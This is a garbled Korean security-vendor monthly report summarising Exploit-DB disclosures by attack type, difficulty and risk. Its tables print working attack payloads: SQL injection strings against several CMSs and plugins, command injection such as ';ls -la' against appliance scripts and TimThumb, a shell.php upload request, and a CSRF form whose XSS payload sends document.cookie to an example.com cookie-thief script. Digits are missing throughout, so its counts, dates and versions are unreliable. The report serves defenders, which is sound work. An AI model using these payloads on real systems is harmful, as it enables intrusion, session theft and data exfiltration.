EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다. 이번달은 공격에대한도많이보고가되었습니다. 은공격의난이도는낮아도위험도는매우높은공격들이많으므로서버관리자는 에노출되지않도록각별한주의가필요합니다. 주요소프트웨어발생현황을보면 에서가장많은이보고되었습니다. 해당소프트웨어의은 공격이대부분이므로해당서버의관리자는소스레벨의각별한주의를여 공격에노출되지않도록대응방안을마련는것이필요합니다.. 별보고개수 보고개수 SQL 9 6 Directory Traversal CSRF XSS Code File Upload 총합계 0 9 7 6 5 4 0 9 SQL 6 Directory Traversal 별보고개수 CSRF XSS Code File Upload. 위험도별분류위험도 보고개수 백분율 상 7.% 5 6.% 0 0.00% 합계 00.00% 5 위험도별분류 7 상. 공격난이도별현황공격난이도 보고개수 백분율 상 9.0%.6% 7 77.7% 총합계 00.00% 공격난이도별현황 7 상 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 주요소프트웨어별발생현황 webproject ZeroCMS Lunar Cacti Superlinks Plugin 총합계 webproject ZeroCMS Lunar Cacti Superlinks Plugin ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 SQL 4.0 - categories-x.php SQL 4.0 - logs-x.php
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal 4.0 - users-x.php 4.0 -support-x.php 4.0 time-x.php 4.0 - scheduledreports-x.php 4.0 - reporting-x.php 상 4.0 - logs-x.php Directory Traversal
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /wordpress/pdb-signup/ HTTP/. 04-06-0 6 SQL Participants Database Participants.5.4. - /wordpress/pdb-signup/ Database SQL.5.4. query=insert%0into%0wp_users%0a(id%cuser_login%cu ser_pass%cuser_nicename%cuser_email%cuser_registered% Cuser_status%Cdisplay_name)%0AVALUES%0A(7%C0x746 5774%C0x450445a7a59655446f464b6955657677 f5464764f475a4b%c0x59677566f%c0x7465774 04-06-0 66 SQL GET /tracker.php HTTP/. +. - tracker.php + User-Agent: SQL. Transmission/.5%7%0OR%0(SLEEP(0))%0AND%0%7aaa a%7%d%7aaaa POST /Products/NET/Controls/ASP/File-Upload-Explorer/ HTTP/. 04-06-09 700 Directory Traversal ASPxFileManager 0. to.. - File-Upload-Explorer Directory Traversal ASPxFileManag er 0. to.. 04-06-09 SQL 04-06-09 04-06-09 04-06-09 4.0-4.0 categories-x.php SQL 취약 /categories-x.php?getcategories&sortkey=name)%0limit%0;-- 점 4.0 - logsx.php /logs-x.php?jaction=view&fname=webtitan.log;ls -la 4.0 4.0 - usersx.php /users-x.php?findldapdc=&ldapserver=ls -la 4.0 POST /support-x.php HTTP/. 4.0 -supportx.php 4.0 POST /time-x.php HTTP/. 04-06-09 4.0 timex.php 4.0 jaction=ntpsync&timezone=europe%flondon&ntp=&ntpserv 04-06-09 04-06-09 4.0 - scheduledreports-x.php 4.0 - reporting-x.php ers_entry=&date_month=4&date_day=&date_year=04&h_ti /scheduledreports-x.php?runreport=&reportid=ls -la POST /reporting-x.php HTTP/. 4.0 4.0 jaction=ntpsync&timezone=europe%flondon&ntp=&ntpserv 04-06-09 Directory Traversal 상 4.0 - logsx.php Directory Traversal ers_entry=&date_month=4&date_day=&date_year=04&h_ti POST /logs-x.php HTTP/. 4.0 04-06-0 70 SQL 상상 04-06- 09 SQL ZeroCMS.0 - /zerocms/zero_view_article.php?article_id=7+union+all+selec zero_view_article.php SQL t+concat(unhex(hex(cast(database()+as+char)))),,,4,5,6-- Cacti Superlinks Plugin.4- - superlinks.php SQL /cacti/plugins/superlinks/superlinks.php?id=%0or%0=-- ZeroCMS ZeroCMS.0 Cacti Superlinks Cacti Superlinks Plugin Plugin.4-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /index.php?m=contacts HTTP/. 04-06-9 SQL 상 상 webproject. - index.php SQL webproject webproject. search_string='and(select from(select count(*),concat((select version() from information_schema.tables limit 04-06-9 SQL 상 webproject. - do_updatecontact.php SQL 0,),floor(rand(0)*))x from information_schema.tables group by POST /do_updatecontact.php HTTP/. webproject webproject. 04-06-9 SQL 상 webproject. - updatecontact.php SQL updatekey=%7%0union%0select%0%7immuniweb%7% POST /updatecontact.php HTTP/. webproject webproject. updatekey=%7%0union%0select%0%7immuniweb%7% POST /lunarcms/admin/extensions.php?ext=contact_form&top HTTP/. --------7577444707775057 -----------------------------7577444707775057 Content-Disposition: form-data; name=""keyword"" 04-06- 0 CSRF 04-06- 46 SQL Lunar CMS. - extensions.php CSRF ZeroCMS.0 - zero_transact_article.php SQL <html> <body> <form action="http://localhost/lunarcms/admin/extensions.php?ext=co ntact_form&top" method="post"> <input type="hidden" name="email" value='"><script>alert();</script>' /> <input type="hidden" name="error" value="" /> <input type="hidden" name="sent" value="" /> <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie=' +document.cookie;</script>' /> <input type="hidden" name="submit" value="submit" /> <input type="submit" value="submit form" /> POST /zerocms/zero_transact_article.php HTTP/. Lunar Lunar CMS. ZeroCMS ZeroCMS.0 04-06-4 5 Code 상 04-06-5 67 File Upload 상 TimThumb.. WebShot - img.php Code Lunar CMS. - connector.php File Upload action=submit+comment&article_id=%0or%0=&comment /wpcontent/themes/parallax/themify/img.php?webshot=&src=http: //loncatlab.local/$(touch$ifs/tmp/longcat) POST /lc/admin/includes/elfinder/php/connector.php HTTP/. Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) --------7dd00990f Connection: Close TimThumb.. WebShot Lunar Lunar CMS. -----------------------------7dd00990f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /wp-admin/options-general.php?page=simple-sharebuttons-adder HTTP/. --------7577444707775057 -----------------------------7577444707775057 04-06-7 96 CSRF 04-06-7 95 XSS Simple Share Buttons Adder Plugin 4.4 - optionsgeneral.php CSRF Control Panel 4.0.5 - login.cgi XSS Content-Disposition: form-data; name=""keyword"" <form action=\"http://scone.local:000/wp-admin/optionsgeneral.php?page=simple-share-buttons-adder\" method=\"post\"> <input type=\"hidden\" name=\"ssba_options\" value=\"save\"> <input type=\"checkbox\" name=\"ssba_homepage\" value=\"y\"> <input type=\"text\" name=\"ssba_text_placement\" value= \"below\"> <input type=\"text\" name=\"ssba_before_or_after\" value= \"after\"> <input type=\"text\" name=\"ssba_share_text\" value=\"<script>alert(\'foo\')</script>\"> /login.cgi?login=abc%%e%cscript%ealert(/bga/)%c/script %E Simple Share Buttons Adder Plugin 4.4 Control Panel 4.0.5